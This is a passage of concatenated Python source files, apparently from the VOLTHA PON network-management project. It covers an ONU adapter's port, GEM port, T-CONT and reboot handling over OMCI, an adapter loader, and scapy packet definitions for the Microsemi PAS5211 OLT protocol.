uni_port = Port(
port_no=uni,
label='UNI facing Ethernet port '+str(uni),
type=Port.ETHERNET_UNI,
admin_state=AdminState.ENABLED,
oper_status=OperStatus.ACTIVE
)
self.adapter_agent.add_port(device.id, uni_port)
# add uni port to logical device
cap = OFPPF_1GB_FD | OFPPF_FIBER
self.adapter_agent.add_logical_port(parent_logical_device_id,
LogicalPort(
id='uni-{}'.format(port_no),
ofp_port=ofp_port(
port_no=port_no,
hw_addr=mac_str_to_tuple('00:00:00:%02x:%02x:%02x' %
(device.proxy_address.onu_id & 0xff,
(port_no >> 8) & 0xff,
port_no & 0xff)),
#name='uni-{}'.format(port_no),
name=name,
config=0,
state=OFPPS_LIVE,
curr=cap,
advertised=cap,
peer=cap,
curr_speed=OFPPF_1GB_FD,
max_speed=OFPPF_1GB_FD
),
device_id=device.id,
device_port_no=uni_port.port_no
))
def del_uni_port(self, device, parent_logical_device_id,
name, parent_port_num=None):
self.log.info('del-uni-port', device_id=device.id,
logical_device_id=parent_logical_device_id,
name=name)
if parent_port_num is not None:
uni = parent_port_num
port_no = parent_port_num
else:
uni = self.uni_ports[0]
port_no = device.proxy_address.channel_id + uni
# register physical ports
ports = self.adapter_agent.get_ports(self.device_id, Port.ETHERNET_UNI)
for port in ports:
if port.label == 'UNI facing Ethernet port '+str(uni):
break
self.adapter_agent.delete_port(self.device_id, port)
self.adapter_agent.delete_logical_port_by_id(parent_logical_device_id,
'uni-{}'.format(port_no))
@inlineCallbacks
def delete_v_ont_ani(self, data):
self.log.info('deleting-v_ont_ani')
device = self.adapter_agent.get_device(self.device_id)
# construct message
# MIB Reset - OntData - 0
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_mib_reset()
yield self.wait_for_response()
self.proxy_address = device.proxy_address
self.adapter_agent.unregister_for_proxied_messages(device.proxy_address)
ports = self.adapter_agent.get_ports(self.device_id, Port.PON_ONU)
if ports is not None:
for port in ports:
if port.label == 'PON port':
self.adapter_agent.delete_port(self.device_id, port)
break
def create_interface(self, data):
if isinstance(data, VEnetConfig):
parent_port_num = None
onu_device = self.adapter_agent.get_device(self.device_id)
ports = self.adapter_agent.get_ports(onu_device.parent_id, Port.ETHERNET_UNI)
parent_port_num = None
for port in ports:
if port.label == data.interface.name:
parent_port_num = port.port_no
break
parent_device = self.adapter_agent.get_device(onu_device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
self.add_uni_port(onu_device, logical_device_id,
data.name, parent_port_num)
if parent_port_num is None:
self.log.error("matching-parent-uni-port-num-not-found")
return
onu_ports = self.adapter_agent.get_ports(self.device_id, Port.PON_ONU)
if onu_ports:
# To-Do :
# Assumed only one PON port and UNI port per ONU.
pon_port = onu_ports[0]
else:
self.log.error("No-Pon-port-configured-yet")
return
self.adapter_agent.delete_port_reference_from_parent(self.device_id,
pon_port)
pon_port.peers[0].device_id = onu_device.parent_id
pon_port.peers[0].port_no = parent_port_num
self.adapter_agent.add_port_reference_to_parent(self.device_id,
pon_port)
else:
self.log.info('Not-handled-Yet')
return
def update_interface(self, data):
self.log.info('Not-Implemented-yet')
return
def remove_interface(self, data):
if isinstance(data, VEnetConfig):
parent_port_num = None
onu_device = self.adapter_agent.get_device(self.device_id)
ports = self.adapter_agent.get_ports(onu_device.parent_id, Port.ETHERNET_UNI)
parent_port_num = None
for port in ports:
if port.label == data.interface.name:
parent_port_num = port.port_no
break
parent_device = self.adapter_agent.get_device(onu_device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
self.del_uni_port(onu_device, logical_device_id,
data.name, parent_port_num)
if isinstance(data, VOntaniConfig):
self.delete_v_ont_ani(data)
else:
self.log.info('not-handled-yet')
return
@inlineCallbacks
def create_gemport(self, data):
self.log.info('create-gemport')
gem_port = GemportsConfigData()
gem_port.CopyFrom(data)
if gem_port.tcont_ref is None:
self.log.error('recevied-null-gem-port-data')
else:
#To-Do Need to see how the valuse 0x8001 is derived
self.send_create_gem_port_network_ctp(gem_port.gemport_id,
gem_port.gemport_id, 0x8001,
"bi-directional", 0x100)
yield self.wait_for_response()
# GEM Interworking config
# Create AR - GemInterworkingTp - Gem_port,TP_pointer -
# Gem port CTP pointer -
# Mapper service profile id
self.send_create_gem_inteworking_tp(gem_port.gemport_id,
gem_port.gemport_id, 0x8001)
yield self.wait_for_response()
# Mapper Service Profile config
# Set AR - 802.1pMapperServiceProfile - Mapper_ profile_id -
# gem_port_tp pointer
self.send_set_8021p_mapper_service_profile(0x8001,
gem_port.gemport_id)
yield self.wait_for_response()
@inlineCallbacks
def remove_gemport(self, data):
self.log.info('remove-gemport')
gem_port = GemportsConfigData()
gem_port.CopyFrom(data)
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_set_8021p_mapper_service_profile(0x8001,
0xFFFF)
yield self.wait_for_response()
self.send_delete_omci_mesage(GemInterworkingTp.class_id,
gem_port.gemport_id)
yield self.wait_for_response()
#To-Do Need to see how the valuse 0x8001 is derived
self.send_delete_omci_mesage(GemPortNetworkCtp.class_id,
gem_port.gemport_id)
yield self.wait_for_response()
@inlineCallbacks
def create_tcont(self, tcont_data, traffic_descriptor_data):
self.log.info('create-tcont')
tcont = TcontsConfigData()
tcont.CopyFrom(tcont_data)
if tcont.interface_reference is not None:
self.log.debug('tcont', tcont=tcont.alloc_id)
self.send_set_tcont(0x8001, tcont.alloc_id)
yield self.wait_for_response()
else:
self.log.info('recevied-null-tcont-data', tcont=tcont.alloc_id)
@inlineCallbacks
def remove_tcont(self, tcont_data, traffic_descriptor_data):
self.log.info('remove-tcont')
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error('device-unreachable')
returnValue(None)
self.send_set_tcont(0x8001, 0xFFFF)
yield self.wait_for_response()
def create_multicast_gemport(self, data):
self.log.info('Send relevant OMCI message')
@inlineCallbacks
def disable(self, device):
try:
self.log.info('sending-admin-state-lock-towards-device', device=device)
self.send_set_admin_state(0x0000, ADMIN_STATE_LOCK)
yield self.wait_for_response()
device = self.adapter_agent.get_device(device.id)
# Disable all ports on that device
self.adapter_agent.disable_all_ports(self.device_id)
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
# Mark OF PORT STATE DOWN
ports = self.adapter_agent.get_ports(device.id, Port.ETHERNET_UNI)
for port in ports:
state = OFPPS_LINK_DOWN
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, state)
device.oper_status = OperStatus.UNKNOWN
device.connect_status = ConnectStatus.UNREACHABLE
self.adapter_agent.update_device(device)
except Exception as e:
log.exception('exception-in-onu-disable', exception=e)
@inlineCallbacks
def reenable(self, device):
try:
self.log.info('sending-admin-state-unlock-towards-device', device=device)
self.send_set_admin_state(0x0000, ADMIN_STATE_UNLOCK)
yield self.wait_for_response()
device = self.adapter_agent.get_device(device.id)
# Re-enable the ports on that device
self.adapter_agent.enable_all_ports(device.id)
parent_device = self.adapter_agent.get_device(device.parent_id)
logical_device_id = parent_device.parent_id
assert logical_device_id
# Mark OF PORT STATE UP
ports = self.adapter_agent.get_ports(device.id, Port.ETHERNET_UNI)
for port in ports:
state = OFPPS_LIVE
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, state)
device.oper_status = OperStatus.ACTIVE
device.connect_status = ConnectStatus.REACHABLE
self.adapter_agent.update_device(device)
except Exception as e:
log.exception('exception-in-onu-reenable', exception=e)
@inlineCallbacks
def reboot(self):
self.log.info('reboot-device')
device = self.adapter_agent.get_device(self.device_id)
if device.connect_status != ConnectStatus.REACHABLE:
self.log.error("device-unreacable")
returnValue(None)
self.send_reboot()
response = yield self.wait_for_response()
if response is not None:
omci_response = response.getfieldval("omci_message")
success_code = omci_response.getfieldval("success_code")
if success_code == 0:
self.log.info("reboot-command-processed-successfully")
# Update the device connection and operation status
device = self.adapter_agent.get_device(self.device_id)
device.connect_status = ConnectStatus.UNREACHABLE
device.oper_status = OperStatus.DISCOVERED
self.adapter_agent.update_device(device)
self.disable_ports(device)
else:
self.log.info("reboot-failed", success_code=success_code)
else:
self.log.info("error-in-processing-reboot-response")
def disable_ports(self, onu_device):
self.log.info('disable-ports', device_id=self.device_id)
# Disable all ports on that device
self.adapter_agent.disable_all_ports(self.device_id)
parent_device = self.adapter_agent.get_device(onu_device.parent_id)
assert parent_device
logical_device_id = parent_device.parent_id
assert logical_device_id
ports = self.adapter_agent.get_ports(onu_device.id, Port.ETHERNET_UNI)
for port in ports:
port_id = 'uni-{}'.format(port.port_no)
self.update_logical_port(logical_device_id, port_id, OFPPS_LINK_DOWN)
```
#### File: voltha/adapters/loader.py
```python
import os
import structlog
from twisted.internet.defer import inlineCallbacks, returnValue
from zope.interface import implementer
from zope.interface.verify import verifyClass
from voltha.adapters.interface import IAdapterInterface
from voltha.core.adapter_agent import AdapterAgent
from voltha.registry import IComponent
from voltha.adapters.iadapter import IAdapter, OltAdapter, OnuAdapter
log = structlog.get_logger()
mydir = os.path.abspath(os.path.dirname(__file__))
@implementer(IComponent)
class AdapterLoader(object):
def __init__(self, config):
self.config = config
self.adapter_agents = {} # adapter-name -> adapter instance
@inlineCallbacks
def start(self):
log.debug('starting')
for adapter_name, adapter_class in self._find_adapters():
agent = AdapterAgent(adapter_name, adapter_class)
yield agent.start()
self.adapter_agents[adapter_name] = agent
log.info('started')
returnValue(self)
@inlineCallbacks
def stop(self):
log.debug('stopping')
for proxy in self.adapter_agents.values():
yield proxy.stop()
self.adapter_agents = {}
log.info('stopped')
def get_agent(self, adapter_name):
return self.adapter_agents[adapter_name]
def _find_adapters(self):
subdirs = os.walk(mydir).next()[1]
for subdir in subdirs:
try:
adapter_name = subdir
py_file = os.path.join(mydir, subdir, subdir + '.py')
if os.path.isfile(py_file):
try:
package_name = __package__ + '.' + subdir
pkg = __import__(package_name, None, None, [adapter_name])
module = getattr(pkg, adapter_name)
except ImportError, e:
log.exception('cannot-load', file=py_file, e=e)
continue
for attr_name in dir(module):
cls = getattr(module, attr_name)
if isinstance(cls, type) and \
cls is not IAdapter and \
cls is not OltAdapter and \
cls is not OnuAdapter and \
IAdapterInterface.implementedBy(cls):
verifyClass(IAdapterInterface, cls)
yield adapter_name, cls
except Exception, e:
log.exception('failed', e=e)
```
#### File: adapters/microsemi_olt/PAS5211.py
```python
import struct
from scapy.fields import LEShortField, Field, LEIntField, LESignedIntField, FieldLenField, FieldListField, PacketField, \
ByteField, StrFixedLenField, ConditionalField, StrField, MACField, LELongField, LenField, StrLenField
from scapy.layers.l2 import DestMACField, ETHER_ANY, Ether
from scapy.packet import Packet, bind_layers
from scapy.utils import lhex
from scapy.volatile import RandSInt
from scapy.layers.ntp import XLEShortField
from voltha.adapters.microsemi_olt.PAS5211_constants import PON_ENABLE, PON_PORT_PON, PON_FALSE, PON_TRUE
from voltha.extensions.omci.omci_frame import OmciFrame
"""
PAS5211 Constants
"""
#TODO get range from olt_version message
CHANNELS=range(0,4)
class XLESignedIntField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "<i")
def randval(self):
return RandSInt()
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
class LESignedShortField(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "<h")
class PAS5211FrameHeader(Packet):
name = "PAS5211FrameHeader"
fields_desc = [
LEShortField("part", 1),
LEShortField("total_parts", 1),
LEShortField("size", 0),
XLESignedIntField("magic_number", 0x1234ABCD)
]
class PAS5211MsgHeader(Packet):
name = "PAS5211MsgHeader"
fields_desc = [
LEIntField("sequence_number", 0),
XLEShortField("opcode", 0),
LEShortField("event_type", 0),
LESignedShortField("channel_id", -1),
LESignedShortField("onu_id", -1),
LESignedIntField("onu_session_id", -1)
]
class PAS5211Msg(Packet):
opcode = "Must be filled by subclass"
pass
class PAS5211MsgGetProtocolVersion(PAS5211Msg):
opcode = 2
name = "PAS5211MsgGetProtocolVersion"
fields_desc = [ ]
class PAS5211MsgGetProtocolVersionResponse(PAS5211Msg):
name = "PAS5211MsgGetProtocolVersionResponse"
fields_desc = [
LEShortField("major_hardware_version", 0),
LEShortField("minor_hardware_version", 0),
LEShortField("major_pfi_version", 0),
LEShortField("minor_pfi_version", 0)
]
class PAS5211MsgGetOltVersion(PAS5211Msg):
opcode = 3
name = "PAS5211MsgGetOltVersion"
fields_desc = [ ]
class PAS5211MsgGetOltVersionResponse(PAS5211Msg):
name = "PAS5211MsgGetOltVersionResponse"
fields_desc = [
LEShortField("major_firmware_version", 0),
LEShortField("minor_firmware_version", 0),
LEShortField("build_firmware_version", 0),
LEShortField("maintenance_firmware_version", 0),
LEShortField("major_hardware_version", 0),
LEShortField("minor_hardware_version", 0),
LEIntField("system_port_mac_type", 0),
FieldLenField("channels_supported", 0, fmt="<H"),
LEShortField("onus_supported_per_channel", 0),
LEShortField("ports_supported_per_channel", 0),
LEShortField("alloc_ids_supported_per_channel", 0),
FieldListField("critical_events_counter", [0, 0, 0, 0],
LEIntField("entry", 0),
count_from=lambda pkt: pkt.channels_supported),
FieldListField("non_critical_events_counter", [0, 0, 0, 0],
LEIntField("entry", 0),
count_from=lambda pkt: pkt.channels_supported)
]
class SnrBurstDelay(Packet):
name = "SnrBurstDelay"
fields_desc= [
LEShortField("timer_delay", None),
LEShortField("preamble_delay", None),
LEShortField("delimiter_delay", None),
LEShortField("burst_delay", None)
]
def extract_padding(self, p):
return "", p
class RngBurstDelay(Packet):
name = "SnrBurstDelay"
fields_desc= [
LEShortField("timer_delay", None),
LEShortField("preamble_delay", None),
LEShortField("delimiter_delay", None)
]
def extract_padding(self, p):
return "", p
class BurstTimingCtrl(Packet):
name = "BurstTimingCtrl"
fields_desc = [
PacketField("snr_burst_delay", None, SnrBurstDelay),
PacketField("rng_burst_delay", None, RngBurstDelay),
LEShortField("burst_delay_single", None),
LEShortField("burst_delay_double", None)
]
def extract_padding(self, p):
return "", p
class GeneralOpticsParams(Packet):
name = "GeneralOpticsParams"
fields_desc= [
ByteField("laser_reset_polarity", None),
ByteField("laser_sd_polarity", None),
ByteField("sd_source", None),
ByteField("sd_hold_snr_ranging", None),
ByteField("sd_hold_normal", None),
ByteField("reset_type_snr_ranging", None),
ByteField("reset_type_normal", None),
ByteField("laser_reset_enable", None),
]
def extract_padding(self, p):
return "", p
class ResetValues(Packet):
name = "ResetDataBurst"
fields_desc = [
ByteField("bcdr_reset_d2", None),
ByteField("bcdr_reset_d1", None),
ByteField("laser_reset_d2", None),
ByteField("laser_reset_d1", None)
]
def extract_padding(self, p):
return "", p
class DoubleResetValues(Packet):
name = "ResetDataBurst"
fields_desc = [
ByteField("bcdr_reset_d4", None),
ByteField("bcdr_reset_d3", None),
ByteField("laser_reset_d4", None),
ByteField("laser_reset_d3", None)
]
def extract_padding(self, p):
return "", p
class ResetTimingCtrl(Packet):
name = "ResetTimingCtrl"
fields_desc = [
PacketField("reset_data_burst", None, ResetValues),
PacketField("reset_snr_burst", None, ResetValues),
PacketField("reset_rng_burst", None, ResetValues),
PacketField("single_reset", None, ResetValues),
PacketField("double_reset", None, DoubleResetValues),
]
def extract_padding(self, p):
return "", p
class PreambleParams(Packet):
name = "PreambleParams"
fields_desc = [
ByteField("correlation_preamble_length", None),
ByteField("preamble_length_snr_rng", None),
ByteField("guard_time_data_mode", None),
ByteField("type1_size_data", None),
ByteField("type2_size_data", None),
ByteField("type3_size_data", None),
ByteField("type3_pattern", None),
ByteField("delimiter_size", None),
ByteField("delimiter_byte1", None),
ByteField("delimiter_byte2", None),
ByteField("delimiter_byte3", None)
]
def extract_padding(self, p):
return "", p
class PAS5211MsgSetOltOptics(PAS5211Msg):
opcode = 106
name = "PAS5211MsgSetOltOptics"
fields_desc = [
PacketField("burst_timing_ctrl", None, BurstTimingCtrl),
PacketField("general_optics_params", None, GeneralOpticsParams),
ByteField("reserved1", 0),
ByteField("reserved2", 0),
ByteField("reserved3", 0),
PacketField("reset_timing_ctrl", None, ResetTimingCtrl),
ByteField("voltage_if_mode", None),
PacketField("preamble_params", None, PreambleParams),
ByteField("reserved4", 0),
ByteField("reserved5", 0),
ByteField("reserved6", 0)
]
class PAS5211MsgSetOltOpticsResponse(PAS5211Msg):
name = "PAS5211MsgSetOltOpticsResponse"
fields_desc = []
class PAS5211MsgSetOpticsIoControl(PAS5211Msg):
opcode = 108
name = "PAS5211MsgSetOpticsIoControl"
fields_desc = [
ByteField("i2c_clk", None),
ByteField("i2c_data", None),
ByteField("tx_enable", None),
ByteField("tx_fault", None),
ByteField("tx_enable_polarity", None),
ByteField("tx_fault_polarity", None),
]
class PAS5211MsgSetOpticsIoControlResponse(PAS5211Msg):
name = "PAS5211MsgSetOpticsIoControlResponse"
fields_desc = [ ]
def extract_padding(self, p):
return "", p
class PAS5211MsgStartDbaAlgorithm(PAS5211Msg):
opcode = 55
name = "PAS5211MsgStartDbaAlgorithm"
fields_desc = [
LEShortField("size", 0),
ByteField("initialization_data", None)
]
class PAS5211MsgStartDbaAlgorithmResponse(PAS5211Msg):
name = "PAS5211MsgStartDbaAlgorithmResponse"
opcode = 10295
fields_desc = []
class PAS5211MsgSetGeneralParam(PAS5211Msg):
opcode = 164
name = "PAS5211MsgSetGeneralParam"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
LEIntField("value", None)
]
class PAS5211MsgSetGeneralParamResponse(PAS5211Msg):
name = "PAS5211MsgSetGeneralParamResponse"
fields_desc = []
class PAS5211MsgGetGeneralParam(PAS5211Msg):
opcode = 165
name = "PAS5211MsgGetGeneralParam"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
]
class PAS5211MsgGetGeneralParamResponse(PAS5211Msg):
name = "PAS5211MsgGetGeneralParamResponse"
fields_desc = [
LEIntField("parameter", None),
LEIntField("reserved", 0),
LEIntField("value", None)
]
class PAS5211MsgGetDbaMode(PAS5211Msg):
opcode = 57
name = "PAS5211MsgGetDbaMode"
fields_desc = []
class PAS5211MsgGetDbaModeResponse(PAS5211Msg):
name = "PAS5211MsgGetDbaModeResponse"
fields_desc = [
LEIntField("dba_mode", None),
]
class PAS5211MsgAddOltChannel(PAS5211Msg):
opcode = 4
name = "PAS5211MsgAddOltChannel"
fields_desc = [
]
class PAS5211MsgAddOltChannelResponse(PAS5211Msg):
name = "PAS5211MsgAddOltChannelResponse"
fields_desc = [
]
class PAS5211MsgSetAlarmConfig(PAS5211Msg):
opcode = 48
name = "PAS5211MsgSetAlarmConfig"
fields_desc = [
LEShortField("type", None),
LEShortField("activate", None),
LEIntField("parameter1", None),
LEIntField("parameter2", None),
LEIntField("parameter3", None),
LEIntField("parameter4", None)
]
class PAS5211MsgSetOltChannelActivationPeriod(PAS5211Msg):
opcode = 11
name = "PAS5211MsgSetOltChannelActivationPeriod"
fields_desc = [
LEIntField("activation_period", None)
]
class PAS5211MsgSetOltChannelActivationPeriodResponse(PAS5211Msg):
name = "PAS5211MsgSetOltChannelActivationPeriodResponse"
fields_desc = []
class PAS5211MsgSetAlarmConfigResponse(PAS5211Msg):
name = "PAS5211MsgSetAlarmConfigResponse"
fields_desc = []
class PAS5211MsgSendCliCommand(PAS5211Msg):
opcode = 15
name = "PAS5211MsgSendCliCommand"
fields_desc = [
FieldLenField("size", None, fmt="<H", length_of="command"),
StrField("command", "")
]
class PAS5211MsgSwitchToInboundMode(PAS5211Msg):
opcode = 0xec
name = "PAS5211MsgSwitchToInboundMode"
fields_desc = [
MACField("mac", None),
LEShortField("mode", 0)
]
class PAS5211MsgGetActivationAuthMode(PAS5211Msg):
opcode = 145
name = "PAS5211MsgGetActivationAuthMode"
fields_desc = [
LEShortField("nothing", 0) # no idea why this is here
]
class PAS5211MsgGetActivationAuthModeResponse(PAS5211Msg):
opcode = 10385
name = "PAS5211MsgGetActivationAuthModeResponse"
fields_desc = [
LEShortField("mode", 0),
LEShortField("reserved", 0),
]
class PAS5211MsgSetOnuOmciPortId(PAS5211Msg):
opcode = 41
name = "PAS5211MsgSetOnuOmciPortId"
fields_desc = [
LEShortField("port_id", 0),
LEShortField("activate", PON_ENABLE)
]
class PAS5211MsgSetOnuOmciPortIdResponse(PAS5211Msg):
opcode = 10281
name = "PAS5211MsgSetOnuOmciPortIdResponse"
fields_desc = []
class PAS5211MsgGetLogicalObjectStatus(PAS5211Msg):
opcode = 223
name = "PAS5211MsgGetLogicalObjectStatus"
fields_desc = [
LEIntField("type", None),
LEIntField("value", None)
]
class PAS5211MsgGetLogicalObjectStatusResponse(PAS5211Msg):
opcode = 10463
name = "PAS5211MsgGetLogicalObjectStatusResponse"
fields_desc = [
LEIntField("type", None),
LEIntField("value", None),
FieldLenField("return_length", None, fmt="<H", length_of="return_value"),
LEIntField("return_value", "")
]
class PAS5211MsgSetOnuAllocId(PAS5211Msg):
opcode = 8
name = "PAS5211MsgSetOnuAllocId"
fields_desc = [
LEShortField("alloc_id", None),
LEShortField("allocate", None)
]
class PAS5211MsgSetOnuAllocIdResponse(PAS5211Msg):
opcode = 10248
name = "PAS5211MsgSetOnuAllocIdResponse"
fields_desc = []
class PAS5211MsgSendDbaAlgorithmMsg(PAS5211Msg):
opcode = 47
name = "PAS5211MsgSendDbaAlgorithmMsg"
fields_desc = [
#LEShortField("id", None),
FieldLenField("size", None, fmt="<H", length_of="data"),
StrLenField("data", "", length_from=lambda x:x.size)
]
class PAS5211MsgSendDbaAlgorithmMsgResponse(PAS5211Msg):
opcode = 10287
name = "PAS5211MsgSendDbaAlgorithmMsgResponse"
fields_desc = []
class PAS5211MsgSetPortIdConfig(PAS5211Msg):
opcode = 18
name = "PAS5211MsgSetPortIdConfig"
fields_desc = [
LEShortField("port_id", None),
LEShortField("activate", PON_ENABLE),
LEShortField("alloc_id", None),
LEIntField("type", None),
LEIntField("destination", None), # Is this the CNI port
# if yes then values are 0-11 (for ruby)
LEShortField("reserved", None)
]
class PAS5211MsgSetPortIdConfigResponse(PAS5211Msg):
opcode = 10258
name = "PAS5211MsgSetPortIdConfigResponse"
fields_desc = []
class PAS5211MsgGetOnuIdByPortId(PAS5211Msg):
opcode = 196
name = "PAS5211MsgGetOnuIdByPortId"
fields_desc = [
LEShortField("port_id", None),
LEShortField("reserved", 0)
]
class PAS5211MsgGetOnuIdByPortIdResponse(PAS5211Msg):
opcode = 196
name = "PAS5211MsgGetOnuIdByPortIdResponse"
fields_desc = [
LEShortField("valid", None),
LEShortField("onu_id", None)
]
class PAS5211SetVlanUplinkConfiguration(PAS5211Msg):
opcode = 39
name = "PAS5211SetVlanUplinkConfiguration"
fields_desc = [
LEShortField("port_id", None),
LEShortField("pvid_config_enabled", None),
LEShortField("min_cos", None),
LEShortField("max_cos", None),
LEIntField("de_bit", None),
LEShortField("reserved", 0)
]
class PAS5211SetVlanUplinkConfigurationResponse(PAS5211Msg):
opcode = 10279
name = "PAS5211SetVlanUplinkConfigurationResponse"
fields_desc = []
class PAS5211GetOnuAllocs(PAS5211Msg):
opcode = 9
name = "PAS5211GetOnuAllocs"
fields_desc = [
LEShortField("nothing", None) # It's in the PMC code... so yeah.
]
class PAS5211GetOnuAllocsResponse(PAS5211Msg):
opcode = 9
name = "PAS5211GetOnuAllocsResponse"
fields_desc = [
LEShortField("allocs_number", None),
FieldListField("alloc_ids", None, LEShortField("alloc_id", None))
]
class PAS5211GetSnInfo(PAS5211Msg):
opcode = 7
name = "PAS5211GetSnInfo"
fields_desc = [
StrFixedLenField("serial_number", None, 8)
]
class PAS5211GetSnInfoResponse(PAS5211Msg):
opcode = 7
name = "PAS5211GetSnInfoResponse"
fields_desc = [
StrFixedLenField("serial_number", None, 8),
LEShortField("found", None),
LEShortField("type", None),
LEShortField("onu_state", None),
LELongField("equalization_delay", None),
LEShortField("reserved", None)
]
class PAS5211GetOnusRange(PAS5211Msg):
opcode = 116
name = "PAS5211GetOnusRange"
fields_desc = [
LEShortField("nothing", None)
]
class PAS5211GetOnusRangeResponse(PAS5211Msg):
opcode = 116
name = "PAS5211GetOnusRangeResponse"
fields_desc = [
LEIntField("min_distance", None),
LEIntField("max_distance", None),
LEIntField("actual_min_distance", None),
LEIntField("actual_max_distance", None)
]
class PAS5211GetPortIdConfig(PAS5211Msg):
opcode = 19
name = "PAS5211GetPortIdConfig"
fields_desc = [
LEShortField("port_id", None),
LEShortField("reserved", None)
]
class PAS5211GetPortIdConfigResponse(PAS5211Msg):
opcode = 19
name = "PAS5211GetPortIdConfigResponse"
fields_desc = [
LEShortField("activate", None),
LEShortField("encryption_state", None),
LEShortField("alloc_id", None),
LEShortField("type", None),
LEShortField("destination", None),
LEShortField("reserved", None),
]
# typedef struct
# {
# short int svlan_id;
# PON_true_false_t forwarding_mode;
# PON_true_false_t use_svlan;
# PON_true_false_t use_cvlan;
# PON_true_false_t use_pbits;
# PON_true_false_t discard_unknown;
# } PASCOMM_msg_set_svlan_at_configuration_t;
class PAS5211SetSVlanAtConfig(PAS5211Msg):
opcode = 63
name = "PAS5211SetSVlanAtConfig"
fields_desc = [
LEShortField("svlan_id", None),
LEShortField("forwarding_mode", None),
LEShortField("use_svlan", None),
LEShortField("use_cvlan", None),
LEShortField("use_pbits", None),
LEShortField("discard_unknown", None),
]
class PAS5211SetSVlanAtConfigResponse(PAS5211Msg):
opcode = 63
name = "PAS5211SetSVlanAtConfigResponse"
fields_desc = []
# typedef struct
# {
# PON_port_id_t source_port_id;
# PON_vlan_tag_t primary_vid;
# PON_true_false_t pvid_config_enabled; /* use_pvid */
# PON_vlan_tag_operation_t svlan_tag_operation;
# PON_vlan_tag_operation_t cvlan_tag_operation;
# PON_vlan_tag_t new_svlan_tag;
# PON_vlan_tag_t new_cvlan_tag;
# PON_vlan_destination_t destination;
# } PASCOMM_msg_set_uplink_vlan_handling_t;
class PAS5211SetUplinkVlanHandl(PAS5211Msg):
opcode = 34
name = "PAS5211SetUplinkVlanHandl"
fields_desc = [
LEShortField("source_port_id", None),
LEShortField("primary_vid", None),
LEShortField("pvid_config_enabled", None),
LEShortField("svlan_tag_operation", None),
LEShortField("cvlan_tag_operation", None),
LEShortField("new_svlan_tag", None),
LEShortField("new_cvlan_tag", None),
LEShortField("destination", None)
]
class PAS5211SetUplinkVlanHandlResponse(PAS5211Msg):
opcode = 34
name = "PAS5211SetUplinkVlanHandlResponse"
fields_desc = []
# typedef struct
# {
# PON_pon_network_traffic_direction_t direction;
# unsigned short extended_svlan_type;
# unsigned short insertion_svlan_ethertype;
# unsigned short extended_cvlan_type;
# unsigned short insertion_cvlan_ethertype;
# PON_pcp_scheme_t pon_pcp_code;
# PON_pcp_scheme_t cni_pcp_code;
# unsigned short reserved;
# } PASCOMM_msg_set_vlan_general_configuration_t;
class PAS5211SetVlanGenConfig(PAS5211Msg):
opcode = 43
name = "PAS5211SetVlanGenConfig"
fields_desc = [
LEShortField("direction", None),
LEShortField("extended_svlan_type", None),
LEShortField("insertion_svlan_ethertype", None),
LEShortField("extended_cvlan_type", None),
LEShortField("insertion_cvlan_ethertype", None),
LEShortField("pon_pcp_code", None),
LEShortField("cni_pcp_code", None),
LEShortField("reserved", None)
]
class PAS5211SetVlanGenConfigResponse(PAS5211Msg):
opcode = 43
name = "PAS5211SetVlanGenConfigResponse"
fields_desc = []
class Frame(Packet):
pass
class PAS5211MsgSendFrame(PAS5211Msg):
opcode = 42
name = "PAS5211MsgSendFrame"
fields_desc = [
FieldLenField("length", None, fmt="<H", length_of="frame"),
LEShortField("port_type", PON_PORT_PON),
LEShortField("port_id", 0),
LEShortField("management_frame", PON_FALSE),
ConditionalField(PacketField("frame", None, Packet), lambda pkt: pkt.management_frame==PON_FALSE),
ConditionalField(PacketField("frame", None, OmciFrame), lambda pkt: pkt.management_frame==PON_TRUE)
]
def extract_padding(self, p):
return "", p
class PAS5211MsgSendFrameResponse(PAS5211Msg):
name = "PAS5211MsgSendFrameResponse"
fields_desc = []
class PAS5211Event(PAS5211Msg):
opcode = 12
class PAS5211EventFrameReceived(PAS5211Event):
name = "PAS5211EventFrameReceived"
fields_desc = [
FieldLenField("length", None, length_of="frame", fmt="<H"),
LEShortField("port_type", PON_PORT_PON),
LEShortField("port_id", 0),
LEShortField("management_frame", PON_FALSE),
LEShortField("classification_entity", None),
LEShortField("l3_offset", None),
LEShortField("l4_offset", None),
LEShortField("ignored", 0), # TODO these do receive values, but there is no code in PMC using it
ConditionalField(PacketField("frame", None, Packet), lambda pkt: pkt.management_frame==PON_FALSE),
ConditionalField(PacketField("frame", None, OmciFrame), lambda pkt: pkt.management_frame==PON_TRUE)
]
class PAS5211EventDbaAlgorithm(PAS5211Event):
name = "PAS5211EventDbaAlgorithm"
fields_desc = [
FieldLenField("size", None, fmt="<H", length_of="data"),
StrLenField("data", "", length_from=lambda x: x.size)
]
class PAS5211EventOnuActivation(PAS5211Event):
name = "PAS5211EventOnuActivation"
fields_desc = [
StrFixedLenField("serial_number", None, length=8),
LEIntField("equalization_period", None)
]
class PAS5211Dot3(Packet):
name = "PAS5211Dot3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
MIN_FRAME_SIZE = 60
def post_build(self, pkt, payload):
pkt += payload
size = ord(payload[4]) + (ord(payload[5]) << 8)
length = size + 6 # this is a idiosyncracy of the PASCOMM protocol
pkt = pkt[:12] + chr(length >> 8) + chr(length & 0xff) + pkt[14:]
padding = self.MIN_FRAME_SIZE - len(pkt)
if padding > 0:
pkt = pkt + ("\x00" * padding)
return pkt
'''
This is needed in order to force scapy to use PAS5211Dot3
instead of the default Dot3 that the Ether class uses.
'''
@classmethod
def PAS_dispatch_hook(cls, _pkt=None, *args, **kargs):
